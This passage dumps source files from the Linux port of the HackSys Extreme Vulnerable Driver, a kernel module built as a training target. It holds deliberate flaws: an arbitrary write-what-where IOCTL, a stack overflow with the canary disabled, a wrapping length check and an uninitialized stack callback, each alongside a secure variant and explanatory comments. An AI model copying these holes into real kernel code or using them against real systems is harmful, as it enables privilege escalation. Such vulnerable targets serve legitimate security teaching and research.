 * hands it to trigger_arbitrary_write(). Only a NULL buffer is rejected
 * here; every further check (or its deliberate absence) lives in the
 * trigger routine.
 *
 * @param[in] io user space buffer
 * @return status code (-EINVAL when no input buffer was supplied)
 */
int arbitrary_write_ioctl_handler(struct hevd_io *io)
{
    PWRITE_WHAT_WHERE descriptor = (PWRITE_WHAT_WHERE)io->input_buffer;

    if (!descriptor)
    {
        return -EINVAL;
    }

    return trigger_arbitrary_write(descriptor);
}
130 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/ArbitraryWrite.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | ArbitraryWrite.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | arbitrary write module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __ARBITRARY_WRITE_H__
54 | #define __ARBITRARY_WRITE_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | //
60 | // Structures
61 | //
62 |
/*
 * Descriptor passed from user mode to the arbitrary-write IOCTL.
 * Both members are raw addresses supplied by the caller: the driver reads a
 * pointer-sized value from *What and stores it at *Where.
 */
typedef struct _WRITE_WHAT_WHERE
{
    void *What;   /* address the pointer-sized value is read from */
    void *Where;  /* address that value is written to */
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;
68 |
69 |
70 | //
71 | // Function Definitions
72 | //
73 |
74 | int trigger_arbitrary_write(PWRITE_WHAT_WHERE user_write_what_where);
75 |
76 | #endif // !__ARBITRARY_WRITE_H__
77 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/BufferOverflowStack.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStack.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | buffer overflow in Stack vulnerability.
48 |
49 | --*/
50 |
51 | #include "BufferOverflowStack.h"
52 |
53 |
/**
 * Trigger the buffer overflow in Stack Vulnerability
 *
 * Copies `size` bytes from `user_buffer` into a fixed BUFFER_SIZE-element
 * array of unsigned long on this function's stack frame. The vulnerable
 * build trusts the caller-supplied length, so any size larger than
 * sizeof(kernel_buffer) overwrites whatever sits above the array in the
 * frame (typically the saved return address).
 *
 * The stack protector is disabled for this one function so the overflow is
 * not caught by a canary check. That is a deliberate choice for a training
 * target; production code must never do this.
 *
 * @param[in] user_buffer the pointer to user mode buffer
 * @param[in] size size of the user mode buffer
 * @return status code (STATUS_SUCCESS, or -EFAULT if the copy faulted)
 */
__attribute__((optimize("-fno-stack-protector")))
int trigger_buffer_overflow_stack(void *user_buffer, size_t size)
{
    int status = STATUS_SUCCESS;
    unsigned long kernel_buffer[BUFFER_SIZE] = { 0 };

    /* Logging the address of a stack array discloses a kernel stack location
     * to anyone who can read the kernel log -- acceptable in a lab only.
     * (Recent kernels hash %p output unless pointer hashing is disabled.) */
    INFO("[+] user_buffer: 0x%p\n", user_buffer);
    INFO("[+] user_buffer size: 0x%zX\n", size);
    INFO("[+] kernel_buffer: 0x%p\n", &kernel_buffer);
    INFO("[+] kernel_buffer size: 0x%zX\n", sizeof(kernel_buffer));

#ifdef SECURE
    /**
     * Secure Note: This is secure because the developer is passing a size
     * equal to size of kernel_buffer to `copy_from_user()`. Hence,
     * there will be no overflow.
     *
     * NOTE(review): the caller-supplied `size` is ignored entirely here, so
     * sizeof(kernel_buffer) bytes are read from user memory even when the
     * caller's buffer is smaller. copy_from_user() fails safely (-EFAULT) on
     * unmapped pages, so this is not a kernel-side hazard, but
     * min(size, sizeof(kernel_buffer)) would be the conventional fix.
     */

    if (copy_from_user(kernel_buffer, user_buffer, sizeof(kernel_buffer)))
    {
        status = -EFAULT;
    }
#else
    INFO("[+] Triggering Buffer Overflow in Stack\n");

    /**
     * Vulnerability Note: This is a vanilla Stack based Overflow vulnerability
     * because the developer is passing the user supplied size directly to
     * `__copy_from_user()` without validating if the size is greater or
     * equal to the size of kernel_buffer. Note also that the double-underscore
     * variant skips access_ok(), so user_buffer is not range-checked at all
     * on this path.
     */

    if (__copy_from_user(kernel_buffer, user_buffer, size))
    {
        status = -EFAULT;
    }
#endif

    return status;
}
101 |
102 |
/**
 * Buffer Overflow Stack Ioctl Handler
 *
 * Forwards the user buffer and its caller-supplied length straight to
 * trigger_buffer_overflow_stack(); only a NULL buffer is rejected here.
 *
 * @param[in] io user space buffer
 * @return status code (-EINVAL when no input buffer was supplied)
 */
int buffer_overflow_stack_ioctl_handler(struct hevd_io *io)
{
    void *user_buffer = io->input_buffer;

    if (!user_buffer)
    {
        return -EINVAL;
    }

    return trigger_buffer_overflow_stack(user_buffer, io->input_buffer_length);
}
125 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/BufferOverflowStack.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | BufferOverflowStack.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | buffer overflow in Stack module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __BUFFER_OVERFLOW_STACK_H__
54 | #define __BUFFER_OVERFLOW_STACK_H__
55 |
56 | #include "Common.h"
57 |
58 |
59 | /**
60 | * Function Definitions
61 | */
62 |
63 | int trigger_buffer_overflow_stack(void *user_buffer, size_t size);
64 |
65 | #endif // !__BUFFER_OVERFLOW_STACK_H__
66 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/CMakeLists.txt:
--------------------------------------------------------------------------------
# Linux kernel module: one kbuild object per source file, linked into hevd.ko.
# When SECURE is truthy the hardened `#ifdef SECURE` code paths are compiled
# (LKM.cmake adds -DSECURE to ccflags-y); otherwise the vulnerable ones are.
if(SECURE)
    message("Generating secure HEVD build configuration")
else()
    message("Generating vulnerable HEVD build configuration")
endif()

set(HEVD_LINUX_SOURCES
    HackSysExtremeVulnerableDriver.c
    BufferOverflowStack.c
    IntegerOverflow.c
    ArbitraryWrite.c
    UninitializedMemoryStack.c
)

lkm_add_driver(NAME HEVD ${HEVD_LINUX_SOURCES})
17 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/Common.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | Common.h
44 |
45 | Abstract:
46 | This module implements the data structures which
47 | are common to the driver modules.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __COMMON_H__
54 | #define __COMMON_H__
55 |
56 | #include
57 | #include
58 | #include
59 | #include
60 | #include
61 | #include
62 | #include
63 | #include
64 |
65 | /**
66 | * Defines
67 | */
68 |
69 | #define BUFFER_SIZE 512
70 |
71 | #define STATUS_SUCCESS 0x0
72 |
73 | #define _STRINGIFY(value) #value
74 | #define STRINGIFY(value) _STRINGIFY(value)
75 |
76 | #define PRINTK(level, fmt, ...) printk(KERN_##level "%s: " fmt, THIS_MODULE->name, ##__VA_ARGS__)
77 |
78 | #define ERR(fmt, ...) PRINTK(ERR, fmt, ##__VA_ARGS__)
79 | #define INFO(fmt, ...) PRINTK(INFO, fmt, ##__VA_ARGS__)
80 | #define WARNING(fmt, ...) PRINTK(WARNING, fmt, ##__VA_ARGS__)
81 |
/*
 * Kernel 5.0 dropped the `type` argument from access_ok(); x_access_ok()
 * papers over the difference so the modules compile on both sides of it.
 * VERIFY_READ/VERIFY_WRITE are defined here only so the call sites stay
 * identical -- on >= 5.0 the type argument is simply discarded.
 *
 * Either way access_ok() is a *range* check (does the span lie below the
 * user/kernel boundary?), not proof that the memory is mapped or writable.
 * It must be followed by copy_from_user()/copy_to_user()/get_user()/
 * put_user(), never by a direct dereference of the user pointer.
 */
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,0,0))

#define VERIFY_READ 0
#define VERIFY_WRITE 1
#define x_access_ok(type, addr, size) access_ok(addr, size)

#else /* LINUX_VERSION_CODE < KERNEL_VERSION(5,0,0) */

#define x_access_ok(type, addr, size) access_ok(type, addr, size)

#endif /* LINUX_VERSION_CODE >= KERNEL_VERSION(5,0,0) */
93 |
94 | typedef void (*FunctionPointer)(void);
95 |
96 |
97 | /**
98 | * Structures
99 | */
100 |
/*
 * IOCTL argument block shared by all HEVD Linux handlers.
 * Every field is caller-controlled: the buffers are user-mode addresses and
 * the lengths are whatever user mode claimed, so each handler must validate
 * them itself before trusting either (the vulnerable paths deliberately don't).
 */
struct hevd_io {
    void *input_buffer;           /* user-mode address of the request data */
    size_t input_buffer_length;   /* caller-supplied length of input_buffer */
    void *output_buffer;          /* user-mode address for the response, if any */
    size_t output_buffer_length;  /* caller-supplied length of output_buffer */
};
107 |
108 |
109 | /**
110 | * Function Definitions
111 | */
112 |
113 | int buffer_overflow_stack_ioctl_handler(struct hevd_io *io);
114 | int integer_overflow_ioctl_handler(struct hevd_io *io);
115 | int arbitrary_write_ioctl_handler(struct hevd_io *io);
116 | int uninitialized_memory_stack_ioctl_handler(struct hevd_io *io);
117 |
118 | #endif // !__COMMON_H__
119 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/IntegerOverflow.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see <https://www.gnu.org/licenses/>.
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | IntegerOverflow.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | integer overflow in kernel module
48 |
49 | --*/
50 |
51 | #include "IntegerOverflow.h"
52 |
53 |
/**
 * Copy up to BUFFER_SIZE words from user mode into a stack array, stopping
 * early at a terminator word (0xBAD0B0B0).
 *
 * The length check is the point of this module. The vulnerable build adds
 * sizeof(unsigned long) to the caller-supplied size_t before comparing, so a
 * size within a few bytes of SIZE_MAX wraps to a tiny number, passes the
 * check, and the copy loop then runs until it meets the terminator, writing
 * past the end of kernel_buffer on the stack. (The original notes quote the
 * 32-bit Windows values 0xFFFFFFFF and 4; on a 64-bit Linux build size_t and
 * unsigned long are both 8 bytes.)
 *
 * @param[in] user_buffer the pointer to user mode buffer
 * @param[in] size size of the user mode buffer
 * @return status code (STATUS_SUCCESS, -EINVAL on a rejected size, -EFAULT on copy fault)
 */
int trigger_integer_overflow(void *user_buffer, size_t size)
{
    unsigned long count = 0;
    int status = STATUS_SUCCESS;
    unsigned long kernel_buffer[BUFFER_SIZE] = {0};
    unsigned long kernel_buffer_terminator = 0xBAD0B0B0;  /* sentinel word that ends the copy */
    size_t terminator_size = sizeof(kernel_buffer_terminator);

    /* Diagnostics only; the stack address is a kernel-layout disclosure
     * acceptable in a lab build. */
    INFO("[+] user_buffer: 0x%p\n", user_buffer);
    INFO("[+] user_buffer size: 0x%zX\n", size);
    INFO("[+] kernel_buffer: 0x%p\n", &kernel_buffer);
    INFO("[+] kernel_buffer size: 0x%zX\n", sizeof(kernel_buffer));

#ifdef SECURE
    /**
     * Secure Note: This is secure because the developer is not doing any arithmetic
     * on the user supplied value. Instead, the developer subtracts the terminator
     * size from sizeof(kernel_buffer) -- both compile-time constants, so nothing can
     * wrap -- and compares the raw size against that bound.
     */

    if (size > (sizeof(kernel_buffer) - terminator_size))
    {
        ERR("[-] Invalid user buffer size: 0x%zX\n", size);

        status = -EINVAL;
        return status;
    }

#else
    INFO("[+] Triggering Integer Overflow\n");

    /**
     * Vulnerability Note: This is a vanilla Integer Overflow vulnerability because
     * `size + terminator_size` is evaluated in size_t: a size within terminator_size
     * of SIZE_MAX wraps to a small value, so the comparison below passes even though
     * size itself is enormous.
     */

    if ((size + terminator_size) > sizeof(kernel_buffer))
    {
        ERR("[-] Invalid user buffer size: 0x%zX\n", size);

        status = -EINVAL;
        return status;
    }
#endif

    /* With a wrapped size this bound is astronomically large; the loop is then
     * ended only by the terminator word (or by -EFAULT from an unmapped user
     * page), long after count has passed BUFFER_SIZE. */
    while (count < (size / sizeof(unsigned long)))
    {
        unsigned long n;

        /* NOTE(review): user_buffer is void *, so `user_buffer + count` advances
         * one *byte* per iteration (GCC void-pointer arithmetic) while
         * kernel_buffer[count] advances one word. Consecutive reads therefore
         * overlap; confirm whether this stride mismatch is intended. */
        if (copy_from_user((void *)&n, user_buffer + count, sizeof(n)))
        {
            status = -EFAULT;
            break;
        }

        if (n == kernel_buffer_terminator)
        {
            break;
        }

        kernel_buffer[count++] = n;  /* out of bounds once count >= BUFFER_SIZE */
    }

    return status;
}
126 |
127 |
/**
 * IOCTL entry point for the integer overflow module.
 *
 * Hands the user-mode input buffer and its declared length to
 * trigger_integer_overflow(). A NULL input buffer is rejected with -EINVAL
 * without touching user memory; the length itself is not inspected here.
 *
 * @param[in] io user space buffer descriptor (input pointer and length)
 * @return status code from trigger_integer_overflow(), or -EINVAL
 */
int integer_overflow_ioctl_handler(struct hevd_io *io)
{
    void *input = io->input_buffer;
    size_t input_length = io->input_buffer_length;

    if (!input)
    {
        return -EINVAL;
    }

    return trigger_integer_overflow(input, input_length);
}
148 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/IntegerOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | IntegerOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures for
47 | integer overflow module.
48 |
49 | --*/
50 |
51 | #pragma once
52 |
53 | #ifndef __INTEGER_OVERFLOW_H__
54 | #define __INTEGER_OVERFLOW_H__
55 |
56 | #include "Common.h"
57 |
58 | /**
59 | * Function Definitions
60 | */
61 |
62 | int trigger_integer_overflow(void *user_buffer, size_t size);
63 |
64 | #endif
65 |
--------------------------------------------------------------------------------
/Driver/HEVD/Linux/UninitializedMemoryStack.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedMemoryStack.c
44 |
45 | Abstract:
46 | This module implements the functions to demonstrate
47 | use of uninitialized memory in Stack vulnerability.
48 |
49 | --*/
50 |
51 | #include "UninitializedMemoryStack.h"
52 |
/**
 * Callback stored in UNINITIALIZED_MEMORY_STACK::Callback by
 * trigger_uninitialized_memory_stack() when the user value matches the magic
 * value. It has no side effect other than logging that it was reached.
 */
void UninitializedMemoryStackObjectCallback(void)
{
    INFO("[+] Uninitialized Memory Stack Object Callback\n");
}
61 |
62 |
/**
 * Demonstrate use of an uninitialized stack object.
 *
 * Reads one unsigned long from user_buffer. Only when it equals the magic value
 * 0xBAD0B0B0 are UninitializedMemory.Value and .Callback assigned; the function
 * then calls .Callback if it is non-NULL.
 *  - SECURE: the object is zero-initialized, so a non-matching value leaves
 *    Callback NULL and nothing is called.
 *  - default: the object is left uninitialized, so on a non-matching value
 *    Callback holds whatever an earlier stack frame left in that slot, and that
 *    stale word decides whether, and where, the indirect call goes (the
 *    deliberate bug this module demonstrates).
 *
 * @param[in] user_buffer the pointer to user mode buffer
 * @param[in] size size of the user mode buffer. Currently unused: sizeof(UserValue)
 *                 bytes are copied regardless of it (NOTE(review): there is no
 *                 size >= sizeof(UserValue) check before the copy)
 * @return STATUS_SUCCESS, or -EINVAL if copy_from_user() fails (NOTE(review):
 *         trigger_integer_overflow() returns -EFAULT for the same condition)
